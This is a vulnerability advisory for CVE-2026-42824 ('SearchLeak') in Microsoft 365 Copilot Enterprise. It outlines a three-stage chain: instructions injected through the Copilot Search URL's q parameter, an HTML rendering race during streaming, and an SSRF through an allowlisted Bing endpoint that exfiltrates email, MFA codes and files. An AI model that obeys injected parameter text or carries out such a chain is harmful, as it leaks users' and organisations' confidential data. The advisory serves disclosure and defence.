PT-2026-46401 · Microsoft · M365 Copilot+1
Dolev Taler
·
Published
2026-06-04
·
Updated
2026-06-16
·
CVE-2026-42824
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
Microsoft 365 Copilot Enterprise (affected versions not specified)
Description
Improper neutralization of special elements used in a command allows an unauthorized attacker to disclose sensitive information over a network. This issue, known as SearchLeak, is a three-stage attack chain that weaponizes Copilot Enterprise Search to exfiltrate corporate data, including email contents, MFA codes, calendar details, and confidential files from SharePoint and OneDrive. The attack inherits the victim's full graph permissions within the organization.
The exploitation process involves:
- Parameter-to-Prompt (P2P) Injection: The
qparameter in the Copilot Search URL is interpreted as executable instructions rather than a search string, allowing attackers to command Copilot to search for and extract specific user data. - HTML Rendering Race Condition: During the AI streaming phase, raw HTML, such as
<img>tags, is temporarily rendered in the DOM before the sanitizer can wrap the output in<code>blocks. - Server-Side Request Forgery (SSRF): The attack bypasses the Content Security Policy (CSP) by using the allowlisted Bing "Search by Image" endpoint, which performs a server-side fetch of a URL containing the stolen data, relaying it to the attacker's server.
Recommendations
At the moment, there is no information about a newer version that contains a fix for this vulnerability.
Command Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
M365 Copilot
Copilot